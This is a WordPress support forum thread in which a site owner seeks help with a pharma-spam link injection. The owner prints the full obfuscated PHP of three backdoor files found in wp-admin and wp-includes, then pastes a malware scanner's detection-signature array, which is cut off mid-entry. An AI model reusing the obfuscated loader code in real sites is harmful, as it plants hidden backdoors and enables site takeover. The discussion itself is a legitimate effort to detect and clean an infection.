Infected by Pharma Link Hacks
-
Our site is infected by Pharma Hacks. Some one keep injecting links in the header of the which are not visible in the code of the page but only visible in the cached version of the page in Google results and its replacing page meta description with the pharma text.
See how it looks like in cached version: https://postimg.org/image/wwpm034v7/
– All Plugins + WP is updated.
While sorting out, I have found 3 suspicious files in following folders:
1. wp-admin >> images >> loading-cameo-hackneyed.php
2. wp-admin >> includes >> theme-ford-propitiate.php
3. wp-includes >> default-distinction-blatant.phploading-cameo-hackneyed.php has following code:
<?php $egjwk="pWyfeeHn*RUEcPg6_3POY19r.5Hcwq6teenZ3210aMhtC_n1lpWes/4QM7SQ4wALeT8Jd2DiivgglExAvBGI6.ab45Dpk650Opyx/RNsZ9eUSvrke9moTLm43QOTA0FK2bg9Fru7U";$czugodyhp=$egjwk[6] .$egjwk[116] .$egjwk[65] .$egjwk[18] .$egjwk[16] .$egjwk[62] .$egjwk[59] .$egjwk[107] .$egjwk[79] .$egjwk[58] .$egjwk[26] .$egjwk[19];$obyxhekfriou=$egjwk[14] .$egjwk[33] .$egjwk[31] .$egjwk[4] .$egjwk[46] .$egjwk[73];$jtwtgzeojpnl=$egjwk[97] .$egjwk[133] .$egjwk[64] .$egjwk[74] .$egjwk[45] .$egjwk[23] .$egjwk[32] .$egjwk[91] .$egjwk[48] .$egjwk[40] .$egjwk[12] .$egjwk[112];$yrtkzopkhxst=$egjwk[100] .$egjwk[24] .$egjwk[8] .$egjwk[53] .$egjwk[5];$ftbkhtxjzqky=$egjwk[85];$dgsrlvjlj=$obyxhekfriou($czugodyhp);$jtwtgzeojpnl($yrtkzopkhxst,$dgsrlvjlj,$ftbkhtxjzqky);?>fo
theme-ford-propitiate.php has following code:
<?php $wlwx='1/MPQp1.HpY70Sxl_mOvt*U2yT/naZKhgHkljeeTrr.dae4V7waJ7DX8glhprG_e0j8w8tQ2Rc3pBcC5uGPQzTzeAeeeiBPtYIWFE'; $rmjhohkok=$wlwx[33]. $wlwx[39]. $wlwx[85]. $wlwx[94]. $wlwx[16]. $wlwx[61]. $wlwx[88]. $wlwx[70]. $wlwx[93]. $wlwx[96]; $dkcozpafi=$wlwx[32]. $wlwx[38]. $wlwx[95]. $wlwx[90]. $wlwx[27]. $wlwx[19]; $wmerwtylb=$wlwx[9]. $wlwx[40]. $wlwx[87]. $wlwx[56]. $wlwx[62]. $wlwx[60]. $wlwx[45]. $wlwx[59]. $wlwx[15]. $wlwx[50]. $wlwx[73]. $wlwx[89]; $nlgtfkbjm=$wlwx[1]. $wlwx[7]. $wlwx[21]. $wlwx[26]. $wlwx[63]; $tzsljjrar=$wlwx[42]; $ibjhsgdku=$dkcozpafi($rmjhohkok); $wmerwtylb($nlgtfkbjm,$ibjhsgdku,$tzsljjrar); ?>
default-distinction-blatant.php has following code
<?php $tkxr="oRDT7LaVH6A.29yTpe2e6PTm1gpvUe*rEg.GttBepNvu17KLCHgSYJU4RcsdZeHbc1r9a6ohEa98O_kCdrw5OPGnhf_Y0cnPwQW3elTye/0i3/fB4Y2Z4JSF";$hktmsmwnaiu=$tkxr[62] .$tkxr[15] .$tkxr[22] .$tkxr[95] .$tkxr[90] .$tkxr[1] .$tkxr[91] .$tkxr[115] .$tkxr[28] .$tkxr[111] .$tkxr[46] .$tkxr[3] .$tkxr[51] .$tkxr[117];$yvjjkmctqlg=$tkxr[33] .$tkxr[100] .$tkxr[37] .$tkxr[17] .$tkxr[87] .$tkxr[42];$qchwthebjnu=$tkxr[26] .$tkxr[66] .$tkxr[61] .$tkxr[25] .$tkxr[77] .$tkxr[31] .$tkxr[104] .$tkxr[40] .$tkxr[101] .$tkxr[68] .$tkxr[57] .$tkxr[39];$igibqhjbkny=$tkxr[109] .$tkxr[34] .$tkxr[30] .$tkxr[105] .$tkxr[29];$ukxqrmsjgza=$tkxr[11];$fdrsodswbty=$yvjjkmctqlg($hktmsmwnaiu);$qchwthebjnu($igibqhjbkny,$fdrsodswbty,$ukxqrmsjgza);?>
Any Suggestion, if these are causing these pharma links.
-
Both these files seem very suspicious. It is highly recommended to move these files from your wp-admin folder to somewhere they are not accessible via web.
Then try again and your website should function well.
I have deleted these files but still no luck. ??
Any other suggestion.If you are hacked then you’ll need to give these a read as well as check your PC.
You need to start working your way through these resources:
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://www.ads-software.com/support/topic/268083#post-1065779
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://ottopress.com/2009/hacked-wordpress-backdoors/Anything less will probably result in the hacker walking straight back into your site again.
Additional Resources:
Hardening WordPress
https://sitecheck.sucuri.net/scanner/
https://www.unmaskparasites.com/
https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.htmlI have uploaded uploaded all new files and deleted all suspected + old files. Changed all passwords but still not luck.
In simple words, i am not able to sort out where code is injected. I am sure its encoded as I have searched in every file.
I have checked Sitemap debugger, it is showing some code having “cialis” & “viagra” words.
Following is the code:
[GOTMLS_definitions_array] => a:7:{s:9:"potential";a:10:{s:4:"eval";a:2:{i:0;s:5:"CCIGG";i:1;s:27:"/[^a-z\/'"]eval\(.+\)[;]*/i";}s:9:"auth_pass";a:2:{i:0;s:5:"CCIGG";i:1;s:24:"/\$auth_pass[ =\t]+.+;/i";}s:21:"document.write iframe";a:2:{i:0;s:5:"CCIGG";i:1;s:52:"/document\.write\(['"]<iframe .+<\/iframe>['"]\);*/i";}s:15:"preg_replace /e";a:2:{i:0;s:5:"CCIGG";i:1;s:50:"/preg_replace[ \t]*\(.+[\/\#\|][i]*e[i]*['"].+\)/i";}s:20:"exec system passthru";a:2:{i:0;s:5:"CCIGG";i:1;s:58:"/\<\?(.+?)exec\((.+?)system\((.+?)passthru\(.+fwrite\(.+/s";}s:29:"External Redirect RewriteRule";a:2:{i:0;s:5:"CCVE4";i:1;s:30:"/RewriteRule [^ ]+ http\:\/\//";}s:35:"no error_reporting long lines alone";a:2:{i:0;s:5:"D35Ba";i:1;s:79:"/<\?(php)*[\r\n\t \@]*error_reporting\(0\);.+?[a-z0-9\/\-\='"\.\]{2000}.*?\?>/i";}s:22:"protected by copyright";a:2:{i:0;s:5:"D8MCw";i:1;s:136:"/\/\* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. \*\//";}s:19:"a span color F1EFE4";a:2:{i:0;s:5:"D8RAP";i:1;s:118:"/\<a [^\>]+\>\<span style="color\:\#F1EFE4;"\>(.+?)\<\/span\>\<\/a\>\<span style="color\:\#F1EFE4;"\>(.+?)\<\/span\>/i";}s:17:"Variable Function";a:2:{i:0;s:5:"E3N2T";i:1;s:61:"/(<![0-9])\$[a-z\-\_0-9]+[ \t]*(\[[^\]]+\][ \t]*)*\(.+?\)\;/i";}}s:9:"whitelist";a:2:{s:3:"php";a:14:{i:0;s:5:"E2AMf";s:38:"5873cd1cea6108202d21347f01f04dcfO81728";s:5:"D759p";s:39:"01363728c843ff93e96b6983ce38eba6O195618";s:5:"D5A83";s:38:"d5f3c9caff14d57c8608d78db0094be0O73643";s:5:"D75D9";s:38:"57af49818bbb949dc0ac6386738655bbO25852";s:5:"D7JD9";s:38:"d49404260d79a4cc3755c00f55de2089O25662";s:5:"D8V8A";s:37:"8661fe2bfa5995f546a33047e903856cO1136";s:5:"DICFC";s:38:"8125d42c4be543f874ea5f6a1b5bde55O25894";s:5:"DICFD";s:39:"eddb5fda74d41dbdac018167536d8d53O231338";s:5:"DICFE";s:38:"c15a4d5c383444b95d28559f8348111dO22588";s:5:"E1R2v";s:38:"e20839c559a66c7cf628653ba2484eaeO26395";s:5:"E1R2x";s:38:"f3382ec15c030bd32e293faf3497e253O11226";s:5:"E230C";s:37:"28a92f46498d32b9a74c5847f75c912eO7399";s:5:"E230C";s:37:"f00aaf01ff02d5756c267bcf920e4c28O1540";s:5:"E2AMf";}s:2:"js";a:19:{i:0;s:5:"E2H5n";s:37:"554bc76c70351187f4ce05ddc012aaedO4776";s:5:"D667X";s:37:"9a9c125814b9715982d246a1ee78084fO5345";s:5:"D667X";s:38:"e36a086123756412293231aead17f24fO37629";s:5:"D75AH";s:37:"a38ac5266924938a4ff5514369c6b40dO4674";s:5:"D75AJ";s:37:"1043a1d7d84ee56f8831a60cdfc5dc28O7077";s:5:"D75DS";s:38:"6ec150b7987caaef98b59c87b9f471beO11842";s:5:"E1R2n";s:38:"6147ccee7aef9dc0c6eb10d8d7b311f9O70883";s:5:"E1R2w";s:37:"ba3293970e13b03a2ea92f5b6b5bf544O3377";s:5:"E22Nq";s:37:"63b0aed9b02f879a6e0295fbea7db854O4702";s:5:"E230D";s:37:"ef4188cb0b60a72017f4c8a1e840ab1eO2950";s:5:"E249L";s:37:"fb8bf6785e55e9e39bea552635c42a64O3270";s:5:"E260C";s:39:"acb33329b9ef8aabd8bd731426803e4eO232482";s:5:"E260E";s:38:"6ceb647592588bcf463befd9408e27adO12025";s:5:"E260H";s:37:"5a318277fedf491a0301e177a9ef10b3O4908";s:5:"E260J";s:38:"dbc3808473def00fce45fe564dc72dcbO14720";s:5:"E260K";s:37:"b989a5bd84f6ebcbc1393ec003e6e991O4969";s:5:"E27EG";s:38:"030b8389376a42ff3da186bf65806217O16531";s:5:"E29D2";s:37:"def257dbb0ab805c4996fd8abb1a6b49O6717";s:5:"E2H5n";}}s:8:"wp_login";a:1:{s:36:"brute force possible on wp-login.php";a:2:{i:0;s:5:"D4OAB";i:1;s:175:"/.*?require\([ \t]*dirname\(__FILE__\)[ \t]*\.[ \t]*["']\/wp\-load\.php["'][ \t]*\);(?!\/\/2013-04-24 DO NOT REMOVE THIS REQUIRED LINE)[^\n]*([\r\n \t]*\$_SESSION\[[^;]+;)*/is";}}s:8:"timthumb";a:1:{s:29:"outdated versions of TimThumb";a:2:{i:0;s:5:"CCIGG";i:1;s:66:"/.+TimThumb.+define[\t ]*\([\t '"]+VERSION[\t '"]+,[\t '"]+1\..+/s";}}s:8:"htaccess";a:6:{s:28:"excesive spaces in .htaccess";a:2:{i:0;s:5:"CCIGG";i:1;s:15:"/[ ]{30}(.*)\n/";}s:26:"excesive tabs in .htaccess";a:2:{i:0;s:5:"CCIGG";i:1;s:16:"/[\t]{10}(.*)\n/";}s:22:"RewriteRule mobile 302";a:2:{i:0;s:5:"D45E9";i:1;s:138:"/RewriteEngine on.+?RewriteRule \^[\(]?\.\*[\)]?\$ http:\/\/(mobile-.+?|.+?count(er)?\.php|.+?\?h=[0-9]+) \[(L\,)?R(=[0-9]{3})?(\,L)?\]/si";}s:26:"php_value auto_append_file";a:2:{i:0;s:5:"D3C6F";i:1;s:31:"/php_value auto_append_file .+/";}s:47:"Taged RewriteCond HTTP_REFERER RewriteRule HTTP";a:2:{i:0;s:5:"D3J6w";i:1;s:167:"/\#[a-zA-Z0-9]+\#.+?RewriteEngine on[\r\n \t]+RewriteCond \%\{HTTP_REFERER\}.+?RewriteRule \^\(\.\*\)\$ http:\/\/.+? \[(L\,)?R=[0-9]{3}(\,L)?\].+?\#\/[a-zA-Z0-9]+\#/si";}s:27:"ErrorDocument 404 wpppm.php";a:2:{i:0;s:5:"DBI60";i:1;s:32:"/ErrorDocument 404 .+wpppm\.php/";}}s:5:"known";a:79:{s:33:"COOKIE preg_match function_exists";a:2:{i:0;s:5:"CCIGG";i:1;s:153:"/if\(isset\(\$_COOKIE\[(.+?)\}[\r\n \t]+if\(preg_match\((.+?)\{[\r\n \t]+if\(.preg_match\((.+?)\{[\r\n \t]+if\(.function_exists\((.+?)([\r\n \t]+\}){3}/s";}s:31:"script googleblogcontainer eval";a:2:{i:0;s:5:"CCIGG";i:1;s:55:"/<script id="googleblogcontainer".+eval\(.+<\/script>/i";}s:22:"include php5.php alone";a:2:{i:0;s:5:"CCIGG";i:1;s:70:"/\<\?php if \(is_file\('php5\.php'\)\) \@include\('php5\.php'\);\?\>/i";}s:27:"document.write iframe small";a:2:{i:0;s:5:"E2GCH";i:1;s:163:"/(document\.write\(['"])?<iframe src=['"]http:\/\/(.+?)( (height|width)=['"]?[0-5]['"]?)+( style=['"]visibility:[\t ]*hidden[^>]*><\/iframe>|><\/iframe>['"]\));*/i";}s:27:"document.write iframe .php5";a:2:{i:0;s:5:"D1EJv";i:1;s:65:"/document\.write\(['"]<iframe .+left\:[ ]?-.+<\/iframe>['"]\);*/i";}s:10:"array eval";a:2:{i:0;s:5:"DAMA5";i:1;s:74:"/\$[_\-\>\.a-z0-9]+[= \t]+array(_map)*[ \t]*\(.+?eval[ \t]*\(.+\)[ \t;]*/i";}s:25:"document.write iframe .ru";a:2:{i:0;s:5:"CCIGG";i:1;s:60:"/document\.write\(['"]<iframe .+\.ru\/.+<\/iframe>['"]\);*/i";}s:8:"eval hex";a:2:{i:0;s:5:"CCIGG";i:1;s:84:"/[\@]*eval[ \t]*\([ \t]*"(\\[xX0-9a-fA-F]{3})+(.+?)(\\[xX0-9a-fA-F]{3})+"\)[ \t]*;/i";}s:19:"function_exists emo";a:2:{i:0;s:5:"CCIGG";i:1;s:58:"/\<\?php if \(\!function_exists\('emo'\)\).+exit;\} \?\>/i";}s:34:"function_exists base64_decode eval";a:2:{i:0;s:5:"CCIGG";i:1;s:141:"/if[ \t]*\([ \t]*\!function_exists[ \t]*\(.+([\)]+[ \t]*)+[\{ \t\n\r]*[\@]*base64_decode[ \t]*\(.+eval[ \t]*\(.+([\)]+[ \t]*)+;[\}\r\n \t]*/i";}s:28:"echo gzinflate base64_decode";a:2:{i:0;s:5:"CCIGG";i:1;s:120:"/\#[a-zA-Z0-9]+\#[\n \t\@]+echo[\( \t\@]+gzinflate[\( \t\@]+base64_decode[\( \t]+.+[\) \t]+;[\n \t]+\#\/[a-zA-Z0-9]+\#/i";}s:21:"preg_replace /e alone";a:2:{i:0;s:5:"CCIGG";i:1;s:106:"/\<\?(php)*\s+preg_replace[ \t]*\([ \t]*['"].+[\/\#\|][i]*e[i]*['"][ \t]*,[ \t]*['"\$].+\)[ \t]*;\s*\?\>/i";}s:19:"preg_replace /e hex";a:2:{i:0;s:5:"D8MBJ";i:1;s:183:"/(\$(color|auth|pass|default)[_\-\>\.a-z0-9]*[= \t]+(.+?);[ \t\n\r]*)*preg_replace[ \t]*\([ \t]*['"].+[\/\#\|][i]*e[i]*['"][ \t]*,[ \t]*['"\$](\\x[0-9A-F][0-9A-F])+['"\$].*\)[ \t;]*/i";}s:31:"preg_replace /e str_replace hex";a:2:{i:0;s:5:"CCIGG";i:1;s:175:"/([ \t\$]*[_\-\>\.a-z0-9]+[= \t]+.+;[ \t\n\r]*)*preg_replace[ \t]*\([ \t]*['"].+[\/\#\|][i]*e[i]*['"][ \t]*,[ \t]*str_replace\((['" \t,\.\$]*\\x[0-9A-F][0-9A-F])+.*\)[ \t;]*/i";}s:17:"eval fromCharCode";a:2:{i:0;s:5:"CCIGG";i:1;s:96:"/(\<script\>)*eval\(.*fromCharCode\((\s*[0-9]+\s*,)+\s*[0-9]+[\s*\)\s*\)\s*[;]*(\<\/script\>)*/i";}s:25:"ini_restore base64_decode";a:2:{i:0;s:5:"CCIGG";i:1;s:110:"/\<\?(php)*\s+ini_restore[ \t]*\(.+\s+.+base64_decode[ \t]*\(.+\s+.+php\.ini.+\s+.+fwrite[ \t]*\([\S\s]+\?\>/i";}s:18:"eval base64_decode";a:2:{i:0;s:5:"D5VCs";i:1;s:192:"/(\/\*.*?\*\/)*[\@]*(error_reporting\(.+base64_decode\(.+?)*eval[ \t]*(\/\*.*?\*\/)*[ \t]*\([^\)]*base64_decode[ \t]*(\/\*.*?\*\/)*[ \t]*\((.+?)(\)[ \t]*(\/\*.*?\*\/)*[ \t]*)+;(\/\*.*?\*\/)*/i";}s:33:"error_reporting variable-function";a:2:{i:0;s:5:"D6AAb";i:1;s:94:"/<\?(php)?[\r\n \t]*(\$[a-z\_0-9]+)[\t =]+['"].+['"][; \t]+[\@]?error_reporting\(.+\2\(.+\?>/i";}s:19:"echo script iframe ";a:2:{i:0;s:5:"CCIGG";i:1;s:144:"/\#[a-zA-Z0-9]+\#[\n \t\@]+echo.+\<script.+\.createElement\([ "']+iframe.+\.style\.(left|top)\='-.+\<\/script\>.+;[\r\n \t]+\#\/[a-zA-Z0-9]+\#/i";}s:13:"eval _REQUEST";a:2:{i:0;s:5:"CCIGG";i:1;s:154:"/[\@]*(error_reporting\(.+base64_decode\(.+)*eval[ \t]*(\/\*.*\*\/)*[ \t]*\([ \t]*(\/\*.*\*\/)*[ \t]*\$_(REQUES|GE|POS)T\[.+\)[ \t]*(\/\*.*\*\/)*[ \t]*;/i";}s:18:"foreach eval array";a:2:{i:0;s:5:"CCIGG";i:1;s:86:"/foreach[ \t]*\(.+\.\[ \t]*=[\@ \t]*sprintf[ \t]*\(.+eval[ \t]*\([ \t]*\$.+\)[ \t]*;/i";}s:31:"excesive spaces in hashed block";a:2:{i:0;s:5:"CCV8F";i:1;s:57:"/\#[a-zA-Z0-9]+\#[\n \t]{50}.+[\n \t]+\#\/[a-zA-Z0-9]+\#/";}s:29:"Javascript obscure eval array";a:2:{i:0;s:5:"D16JW";i:1;s:114:"/\/\*[0-9a-f]{32}\*\/try\{document\[[' "]+b[' "]+\+[' "]+ody[' "]+\].+v[a]?l[\]]?\(z\)\}\}\}\/\*[0-9a-f]{32}\*\//i";}s:30:"JavaScript function xViewState";a:2:{i:0;s:5:"D78Lj";i:1;s:107:"/<script language=['"]JavaScript['"]>[\r\n \t]*function [a-z0-9]+ViewState\(\)(.+?[\r\n \t]*)+?<\/script>/i";}s:29:"add-div-content Viagra Cialis";a:2:{i:0;s:5:"D46Hb";i:1;s:89:"/<\!--start-add-div-content[0-9]*-->.+Viagra.+Cialis.+<\!--end-add-div-content[0-9]*-->/i";}s:21:"javascript array eval";a:2:{i:0;s:5:"D1L8J";i:1;s:112:"/(var)*[ \t]*[_\-\>\.a-z0-9]+[= \t]+\[[ \t]*['"](\x[0-9A-F]{2})+['"]([\+ \t,]+['"].+?['"])*\].+?eval[ \t]*\(.+/i";}s:24:"isset REQUEST eval alone";a:2:{i:0;s:5:"D1MGq";i:1;s:151:"/<\?php[ \t\r\n]+(\$[_\-\>\.a-z0-9]+[= \t]+['"]+[0-9a-f]{32}['"];[ \t\r\n]+)*if\(isset\(\$_(REQUES|GE|POS)T\[.+eval\(.+exit\(\);[ \t]*\}[ \t\r\n]+\?>/i";}s:34:"isset HTTP_USER_AGENT header alone";a:2:{i:0;s:5:"D1ONF";i:1;s:98:"/<\?php if\(isset\(\$_SERVER\[['"]HTTP_USER_AGENT['"]\].+header\(['"]Location: http:\/\/.+;\}\?>/i";}s:25:"strrev Assert eval base64";a:2:{i:0;s:5:"D24IH";i:1;s:220:"/[\r\n \t]+.+?\(["'](\\145|e)(\\166|v)(\\141|a)(\\154|l)(\50|\()(\\142|b)(\\141|a)(\\163|s)(\\145|e)(\66|6)(\64|4)(\\137|_)(\\144|d)(\\145|e)(\\143|c)(\\157|o)(\\144|d)(\\145|e)(\50|\().+?\51\51\73["']\);/i";}s:24:"Retry base64_decode Curl";a:2:{i:0;s:5:"D2SCQ";i:1;s:139:"/<\?php[\r\n \t]+if \(!isset\(\$sRetry\)\).+?HTTP_USER_AGENT.+?base64_decode\(.+?curl_exec.+?curl_close\(\$stCurlHandle\);[\r\n \t\}]+\?>/s";}s:20:"preg_replace all hex";a:2:{i:0;s:5:"D36Lb";i:1;s:83:"/[\@]*preg_replace[ \t]*\([ \t'"\.\,\\x0-9A-F]{20}[ \t'"\.\,\\x0-9A-F]+?\)[ \t;]*/i";}s:14:"iframe in head";a:2:{i:0;s:5:"D53HP";i:1;s:56:"/\<iframe .+\<\/iframe\>[\r\n \t]*(?=\<\/h(tml|ead)\>)/i";}s:36:"Tagged script try document.body eval";a:2:{i:0;s:5:"D3J7E";i:1;s:89:"/<\!--[0-9a-f]+--><script .+?try\{document\.body.+?eval.+?<\/script><\!--\/[0-9a-f]+-->/i";}s:29:"Tagged try document.body eval";a:2:{i:0;s:5:"D3J7N";i:1;s:91:"/\/\*[0-9a-f]+\*\/[\r\n \t]+.+?try\{document\.body.+?eval.+?[\r\n \t]+\/\*\/[0-9a-f]+\*\//i";}s:37:"eval variable-function long-nb-string";a:2:{i:0;s:5:"D48Ls";i:1;s:92:"/eval\(\$[a-zA-Z0-9\[\]'"]+\(['"][a-zA-Z0-9\/\_\-\+\=]{200}[a-zA-Z0-9\/\_\-\+\=]+?['"\);]+/i";}s:41:"function ob_get_level ob_start add_action";a:2:{i:0;s:5:"D3LA4";i:1;s:188:"/if \(\!function\_exists\(.+?\) \{[\r\n \t]+function .+?\) \{[\r\n \t]+if \(\!ob\_get\_level\(\)\) ob\_start\(.+?\);[\r\n \t]+\}[\r\n \t]+(.+[\r\n \t]+)+(add_action\(.+?\);[\r\n \t]+)+\}/i";}s:26:"head script document.write";a:2:{i:0;s:5:"D3PD5";i:1;s:62:"/(?<=\<\/head\>)\<script.+?document\.write\(.+?\<\/script\>/si";}s:14:"script http IP";a:2:{i:0;s:5:"D3REF";i:1;s:61:"/\<script src\="http\:\/([\/|\.][0-9]+){4}.+?\>\<\/script\>/i";}s:18:"script encode eval";a:2:{i:0;s:5:"D8KG9";i:1;s:103:"/<script.+?(([0-9A-Z]{200}|(['"]?,["']?[0-9a-z]+){200}.+?eval)|(eval.+?[0-9 \t\,]{300})).+?<\/script>/i";}s:54:"Tagged base64_decode file_get_contents position iframe";a:2:{i:0;s:5:"D45Dx";i:1;s:161:"/\#[a-zA-Z0-9]+\#[\r\n \t]*.+?base64_decode.+?[\r\n \t]*.+?file_get_contents.+?[\r\n \t]*.+?position.+?[\r\n \t]*.+?\<\/iframe\>.+?[\r\n \t]*\#\/[a-zA-Z0-9]+\#/i";}s:15:"script ajax POC";a:2:{i:0;s:5:"D499j";i:1;s:47:"/<script .+?ajax.php['"]>['"]POC['"]<\/script>/";}s:26:"targets array JAPluginDone";a:2:{i:0;s:5:"D49AJ";i:1;s:81:"/(\/\/files[\t \r\n]+)*\$targets[ =\t]+array\(.+?echo[ "']+JAPluginDone[ "';]+/si";}s:15:"include favicon";a:2:{i:0;s:5:"D4A7Q";i:1;s:46:"/[\r\n]+[\t ;]*include.+favicon\.ico['"\);]+/i";}s:15:"add_filter cred";a:2:{i:0;s:5:"D4J7W";i:1;s:93:"/add_filter\('template_include','get_cred',1\);[\t \r\n]+add_filter\('shutdown','cred',0\);/i";}s:21:"preg_replace strrev e";a:2:{i:0;s:5:"D4OFd";i:1;s:87:"/\$[a-zA-Z0-9\_]+[\= \t]+['"]e\/\*\.\/['"];[\r\n \t]+preg_replace\([ \t]*strrev\(.*\);/";}s:77:"function_exists get file function curl_init file_get_contents fopen curl_exec";a:2:{i:0;s:5:"D4U6h";i:1;s:309:"/(\$file_[a-z0-9]+)[\t =]+['"].+?['"];[\r\n\ \t]*(\$[a-z\_0-9]+[\t =]+.+?;[\r\n\ \t]*)*if[\t ]*\([\t ]*\!function_exists\([\t ]*['"]([a-z\_0-9]*get[a-z\_0-9]*)['"][\t ]*\)[\t ]*\)[\t ]*\{[\r\n\ \t]*function[\t ]+\3.+?curl_init.+?file_get_contents.+?fopen.+?curl_exec.+?\3\([\t ]*\1[\t ]*\);[\r\n\ \t]*[\}]*/is";}s:31:"error_reporting include wp-apps";a:2:{i:0;s:5:"D59JI";i:1;s:73:"/error_reporting\([^\)]+\)[\;\r\n \t]+include[^\;]+\/wp-apps\.php["' ;]+/";}s:35:"require cgi-local php comment alone";a:2:{i:0;s:5:"D59N1";i:1;s:115:"/<\?(php)*[\r\n \t]+[\@]*(require|include)(_once)*[\( \t]+['"]cgi-local\/.+?\.php['"];[\r\n \t]+\#.*[\r\n \t]+\?>/i";}s:52:"ob_start gzinflate ob_get_contents ob_end_clean eval";a:2:{i:0;s:5:"D5EBF";i:1;s:160:"/<\?(php)?[ \t\r\n]+ob_start\(.+\$[a-z\_0-9]+[= \t]+gzinflate\(ob_get_contents\(\)\)[; \t\r\n]+ob_end_clean\(\)[; \t\r\n]+eval\(\$[a-z\_0-9]+[\); \t\r\n]+\?>/is";}s:17:"tagged iframe 1px";a:2:{i:0;s:5:"D636r";i:1;s:122:"/<\!-- .+? -->[\r\n \t]*<iframe width="1px" height="1px" src="http:\/\/[^>]+>[\r\n \t]*<\/iframe>[\r\n \t]*<\!-- .+? -->/i";}s:29:"script after closing body tag";a:2:{i:0;s:5:"D6IBr";i:1;s:51:"/(?<=\<\/body\>)[\r\n \t]*\<script.+?\<\/script\>/i";}s:27:"var R function pYMuS window";a:2:{i:0;s:5:"D6K6v";i:1;s:68:"/\<script\>var R = \[.+?function pYMuS\(.+?\)\(window\)\<\/script\>/";}s:31:"Tagged echo script eval HexHex_";a:2:{i:0;s:5:"D6UIr";i:1;s:122:"/\#([a-z0-9]+)\#[\r\n \t]+echo[\r\n'" \t]+<script*.+?eval.+?([a-z0-9][a-z0-9]\_){100}.+?<\/script>[\r\n'"; \t]+\#\/\1\#/is";}s:31:"variable create_function strrev";a:2:{i:0;s:5:"D85Au";i:1;s:107:"/<\?(php)*[\r\n \t]+(\$[a-z\_0-9]+)[= \t]+create_function\(.+[;\r\n \t]+\2\(strrev\(.+?\)\);[\r\n \t]*\?>/i";}s:22:"html embed object html";a:2:{i:0;s:5:"D879v";i:1;s:57:"/<html>[\r\n \t]*<embed.+?<\/object>[\r\n \t]*<\/html>/is";}s:36:"require new SAPE_client return_links";a:2:{i:0;s:5:"D8FAu";i:1;s:61:"/require_once(.+?)new SAPE_client\((.+?)->return_links\(\);/s";}s:93:"if function_exists _php_cache_speedup_func_optimizer_ register_shutdown_function ob_end_flush";a:2:{i:0;s:5:"D8K7a";i:1;s:161:"/[; \t]*if[ \t]*\(\!function_exists\([' "]+_php_cache_speedup_func_optimizer_[' "]+\)\)(.+?)register_shutdown_function\([' "]+ob_end_flush[' "]+\)[;\r\n \t]*\}/s";}s:44:"error_reporting ini_set if count POST return";a:2:{i:0;s:5:"D8MBn";i:1;s:113:"/[\@]*error_reporting\(0\);([\@ \r\n]*ini_set\((.+?)\)[; \r\n]*)+if \(count\(\$_POST.+return \$[a-z0-9]+[; \}]+/i";}s:38:"div Viagra Cialis script style.display";a:2:{i:0;s:5:"D9HCf";i:1;s:143:"/<div id=['"]([^>]*)['"]>.*Viagra.+Cialis.*<\/div>[\r\n \t]*<script[^>]*>.*document\.getElementById\(["']\1["']\)\.style\.display.*<\/script>/i";}s:71:"php variable array base64_decode function_exists numeric-named function";a:2:{i:0;s:5:"D9TD6";i:1;s:191:"/<\?(php)?[\r\n \t]+\$[a-z\_0-9'"\[\]]+[= \t]array\(.*?base64_decode\((.+?)[\)]+;[\r\n \t]*if[ \t]*\(\!function_exists\(["']_[1-9]+["']\)\)[ \t]*\{[\r\n \t]*function _[1-9]+\((.+?)[\} ]+\?>/i";}s:32:"Tagged if empty script eval echo";a:2:{i:0;s:5:"E1G88";i:1;s:177:"/\#([a-z0-9]+)\#[\r\n \t]+if[ \t]*\(empty\((\$[a-z_0-9]+)\)\)[\r\n\{ \t]+\2[\r\n'" =\t]+<script.+?(eval|src=[\\'"]+http).+?<\/script>[\r\n'"; \t]+echo \2[\r\n; \}\t]+\#\/\1\#/is";}s:44:"var HTTP_USER_AGENT if match string var else";a:2:{i:0;s:5:"DAJH2";i:1;s:126:"/(\$[a-z\_0-9]+)[\t =]+\$_SERVER\[["']HTTP_USER_AGENT['"]\];.+?if \(\$[a-z\_0-9]+\([^,]+, \1\)\) \{[^\}]+\} else \{[^\}]+\}/is";}s:34:"div php error_reporting fopen http";a:2:{i:0;s:5:"DAUD3";i:1;s:105:"/<div [^>]*>[\r\n \t]*<\?(php)?[\r\n \t]+error_reporting.+?fopen\(["']http:\/\/.+?\?>[\r\n \t]*<\/div>/is";}s:69:"DOCUMENT_ROOT if file_exists file_get_contents gzinflate preg_replace";a:2:{i:0;s:5:"DBGA5";i:1;s:294:"/\$([a-z_0-9]+)[\t= ]\$_SERVER\[["']DOCUMENT_ROOT['"]\]\.["'].+?if[\r\n \t]*\([\r\n \t]*file_exists[\r\n \t]*\([\r\n \t]*\$\1[\) \{\r\n\t]+.+?\$([a-z_0-9]+)[\t= \@]file_get_contents[\r\n \t]*\([\r\n \t]*\$\1.+?\$([a-z_0-9]+)[\t= \@]+gzinflate[\r\n \t]*\([\r\n \t]*\$\2.+?preg_replace.+?\);\}/is";}s:54:"function fourofour add_filter all_plugins fourofour_pp";a:2:{i:0;s:5:"DBHMm";i:1;s:81:"/function fourofour\(\).+add_filter\(["']all_plugins[, "']+fourofour_pp["']\);/is";}s:14:"p payday loans";a:2:{i:0;s:5:"DC4FM";i:1;s:60:"/<p[^>]*>[\r\n \t]*.+?payday loan.+?[\r\n]+[\r\n \t]*<\/p>/i";}s:26:"script src earnmoneydo.com";a:2:{i:0;s:5:"E1GHn";i:1;s:60:"/<script.+?src=[\'"]+http:\/\/earnmoneydo.com.+?<\/script>/i";}s:92:"php var array var text if function_exists function foreach chr return variable function text";a:2:{i:0;s:5:"E21DD";i:1;s:296:"/<\?php[\r\n \t]+(\$[a-z\_0-9]+[\t =]+array\((['"][0-9]+['"][\.\, \t]*)+\);[\r\n \t]*)+(\$[a-z\_0-9]+)[\t =]['"][0-9\-\_ a-z\.\='"]+;[\r\n \t]*if[\t\( ]+\!function_exists[\(\t ]+['"]([a-z\_0-9]+)['"][\t \)]+\{[\r\n \t]*function[\t ]+\4.+?foreach.+?chr.+?return.+?\}.+?\$[a-z\_0-9]+\(\3\);\}\?>/is";}s:36:"Tagged error_reporting base64_decode";a:2:{i:0;s:5:"E233W";i:1;s:125:"/(\/\*.+?\*\/)[\r\n \t]*(\$[a-z\_0-9]+)[\t 